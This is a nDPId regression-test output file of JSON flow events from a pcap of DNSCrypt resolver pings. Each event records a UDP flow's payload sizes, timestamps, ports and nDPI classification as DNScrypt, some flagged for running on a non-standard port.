+00834{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304789,"flow_last_seen":946739304818,"flow_idle_time":180000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1655,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":38867,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00833{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304599,"flow_last_seen":946739304627,"flow_idle_time":180000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":345,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":37950,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00836{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304363,"flow_last_seen":946739304399,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":59641,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00834{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304789,"flow_last_seen":946739304821,"flow_idle_time":180000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1655,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":39007,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00696{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304328,"flow_last_seen":946739304362,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":53697,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00696{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311153,"flow_last_seen":946739311314,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":38278,"dst_port":553,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739306241,"flow_last_seen":946739306435,"flow_idle_time":180000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1791,"flow_avg_l4_payload_len":895,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":41800,"dst_port":1443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00832{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":87,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311802,"flow_last_seen":946739312103,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":52911,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00694{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311153,"flow_last_seen":946739311310,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":38349,"dst_port":553,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00694{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304328,"flow_last_seen":946739304361,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":37413,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00833{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305155,"flow_last_seen":946739305189,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":50335,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00694{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305192,"flow_last_seen":946739305220,"flow_idle_time":180000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1652,"flow_avg_l4_payload_len":826,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":53811,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00693{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305327,"flow_last_seen":946739305384,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":555,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":57465,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00694{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305192,"flow_last_seen":946739305218,"flow_idle_time":180000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1652,"flow_avg_l4_payload_len":826,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":33369,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00834{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304789,"flow_last_seen":946739304821,"flow_idle_time":180000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1655,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":59709,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00830{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304628,"flow_last_seen":946739304810,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":43365,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00693{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305328,"flow_last_seen":946739305354,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":555,"flow_avg_l4_payload_len":277,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":55482,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00832{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305219,"flow_last_seen":946739305326,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":52284,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00694{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312132,"flow_last_seen":946739312179,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.153.187.96","src_port":43129,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00833{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304599,"flow_last_seen":946739304628,"flow_idle_time":180000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":345,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":34324,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00692{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305192,"flow_last_seen":946739305214,"flow_idle_time":180000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":692,"flow_avg_l4_payload_len":346,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":47865,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00834{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304363,"flow_last_seen":946739304397,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"104.238.186.192","src_port":39655,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00832{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304628,"flow_last_seen":946739304788,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":43609,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00834{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":90,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311802,"flow_last_seen":946739312105,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":55409,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00830{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312105,"flow_last_seen":946739312136,"flow_idle_time":180000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":701,"flow_avg_l4_payload_len":350,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":43714,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00832{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304789,"flow_last_seen":946739304815,"flow_idle_time":180000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":695,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.122.250","src_port":45767,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00832{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304628,"flow_last_seen":946739304793,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":56043,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00694{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":80,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311153,"flow_last_seen":946739311308,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"205.185.116.116","src_port":38879,"dst_port":553,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00693{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739306241,"flow_last_seen":946739306435,"flow_idle_time":180000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":831,"flow_avg_l4_payload_len":415,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":38283,"dst_port":1443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00832{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312105,"flow_last_seen":946739312132,"flow_idle_time":180000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1661,"flow_avg_l4_payload_len":830,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":33521,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00834{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305349,"flow_last_seen":946739305459,"flow_idle_time":180000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":35228,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00692{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305192,"flow_last_seen":946739305217,"flow_idle_time":180000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":692,"flow_avg_l4_payload_len":346,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":44093,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00830{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304628,"flow_last_seen":946739304791,"flow_idle_time":180000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":56177,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305327,"flow_last_seen":946739305351,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1515,"flow_avg_l4_payload_len":757,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":56022,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00834{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305219,"flow_last_seen":946739305330,"flow_idle_time":180000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":60962,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00835{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":572,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304599,"flow_last_seen":946739304629,"flow_idle_time":180000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":825,"midstream":0,"ts_msec":946739402187,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":59367,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
